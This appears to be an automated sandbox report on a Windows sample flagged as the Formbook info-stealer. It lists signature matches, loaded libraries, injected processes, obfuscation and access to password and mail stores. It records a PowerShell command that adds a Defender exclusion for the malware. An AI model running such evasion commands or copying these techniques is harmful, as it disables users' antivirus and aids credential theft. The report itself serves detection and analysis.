            Source: Scan 00093847.exe, 00000000.00000002.1836424368.0000000003021000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs Scan 00093847.exe
            Source: Scan 00093847.exe, 00000000.00000002.1836888270.000000000411C000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs Scan 00093847.exe
            Source: Scan 00093847.exe, 00000003.00000002.2069978810.000000000117D000.00000040.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs Scan 00093847.exe
            Source: Scan 00093847.exe, 00000003.00000002.2069726961.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameSETUPUGC.EXEj% vs Scan 00093847.exe
            Source: Scan 00093847.exe, 00000003.00000002.2069726961.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameSETUPUGC.EXEj% vs Scan 00093847.exe
            Source: Scan 00093847.exe, Binary or memory string: OriginalFilenameWYNp.exe< vs Scan 00093847.exe
            Source: Scan 00093847.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.Scan 00093847.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.Scan 00093847.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3555734438.0000000004F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2071077232.0000000002950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3552629363.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Scan 00093847.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, TnkgYbd3tme2aO7aiW.cs, Security API names: _0020.SetAccessControl
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, TnkgYbd3tme2aO7aiW.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, TnkgYbd3tme2aO7aiW.cs, Security API names: _0020.AddAccessRule
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, TnkgYbd3tme2aO7aiW.cs, Security API names: _0020.SetAccessControl
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, TnkgYbd3tme2aO7aiW.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, TnkgYbd3tme2aO7aiW.cs, Security API names: _0020.AddAccessRule
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, yCd6TKQ6QdRmG1No7E.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, TnkgYbd3tme2aO7aiW.cs, Security API names: _0020.SetAccessControl
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, TnkgYbd3tme2aO7aiW.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, TnkgYbd3tme2aO7aiW.cs, Security API names: _0020.AddAccessRule
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, yCd6TKQ6QdRmG1No7E.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, yCd6TKQ6QdRmG1No7E.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@10/7@13/9
            Source: C:\Users\user\Desktop\Scan 00093847.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan 00093847.exe.log
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Mutant created: \Sessions\1\BaseNamedObjects\UirBkCWmvYxPzFUFUixVIwoLPH
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkrtf5ih.3yq.ps1
            Source: Scan 00093847.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\Scan 00093847.exe, File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: setupugc.exe, 00000009.00000002.3552722555.0000000003609000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2248883137.0000000003609000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: unknown, Process created: C:\Users\user\Desktop\Scan 00093847.exe "C:\Users\user\Desktop\Scan 00093847.exe"
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe"
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Process created: C:\Users\user\Desktop\Scan 00093847.exe "C:\Users\user\Desktop\Scan 00093847.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe, Process created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"
            Source: C:\Windows\SysWOW64\setupugc.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: version.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: slc.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: wdscore.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: version.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe, Section loaded: wininet.dll
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe, Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe, Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe, Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe, Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe, Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Scan 00093847.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder, Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Scan 00093847.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\setupugc.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Scan 00093847.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Scan 00093847.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Scan 00093847.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: WYNp.pdbSHA256 source: Scan 00093847.exe
            Source: Binary string: setupugc.pdb source: Scan 00093847.exe, 00000003.00000002.2069726961.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, uspEUeZyrqFDmi.exe, 00000008.00000002.3553025155.0000000001088000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uspEUeZyrqFDmi.exe, 00000008.00000000.1983763767.0000000000ADE000.00000002.00000001.01000000.0000000C.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553078473.0000000000ADE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Scan 00093847.exe, 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2069789007.00000000037F2000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2071753263.00000000039A3000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: WYNp.pdb source: Scan 00093847.exe
            Source: Binary string: wntdll.pdb source: Scan 00093847.exe, Scan 00093847.exe, 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, setupugc.exe, 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2069789007.00000000037F2000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2071753263.00000000039A3000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: setupugc.pdbGCTL source: Scan 00093847.exe, 00000003.00000002.2069726961.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, uspEUeZyrqFDmi.exe, 00000008.00000002.3553025155.0000000001088000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, TnkgYbd3tme2aO7aiW.cs.Net Code: NfQZ3e8SES System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, TnkgYbd3tme2aO7aiW.cs.Net Code: NfQZ3e8SES System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Scan 00093847.exe.3057a30.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, TnkgYbd3tme2aO7aiW.cs.Net Code: NfQZ3e8SES System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Scan 00093847.exe.7590000.3.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: Scan 00093847.exeStatic PE information: 0x97CE3D1D [Thu Sep 15 17:27:57 2050 UTC]
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 0_2_07A7247A push ecx; retf 0_2_07A7247B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0041A857 push DD2CA9E8h; retf 3_2_0041A85D
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0040D20D push esp; ret 3_2_0040D258
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_004032C0 push eax; ret 3_2_004032C2
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0040ABA3 push esi; ret 3_2_0040ABA4
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_00408433 push eax; iretd 3_2_00408434
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_00417D95 push ds; ret 3_2_00417D97
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_00418EE1 pushfd ; ret 3_2_00418F06
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0041A68C push 00000063h; retf 3_2_0041A68E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010809AD push ecx; mov dword ptr [esp], ecx3_2_010809B6
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_043324F6 push 00000063h; retf 8_2_043324F8
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_04330D4B pushfd ; ret 8_2_04330D70
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_0432D617 push ebx; retf 8_2_0432D618
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_043326C1 push DD2CA9E8h; retf 8_2_043326C7
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_04325077 push esp; ret 8_2_043250C2
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_04322A0D push esi; ret 8_2_04322A0E
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_0432029D push eax; iretd 8_2_0432029E
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_043303FA push ebp; ret 8_2_043303FB
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_0432FBFF push ds; ret 8_2_0432FC01
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B809AD push ecx; mov dword ptr [esp], ecx9_2_03B809B6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0326C36D push edx; iretd 9_2_0326C36E
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_032703BE push ebp; iretd 9_2_032703CB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_032703F2 push ss; iretd 9_2_032703F6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_032673C9 push 00000063h; retf 9_2_032673CB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03255170 push eax; iretd 9_2_03255171
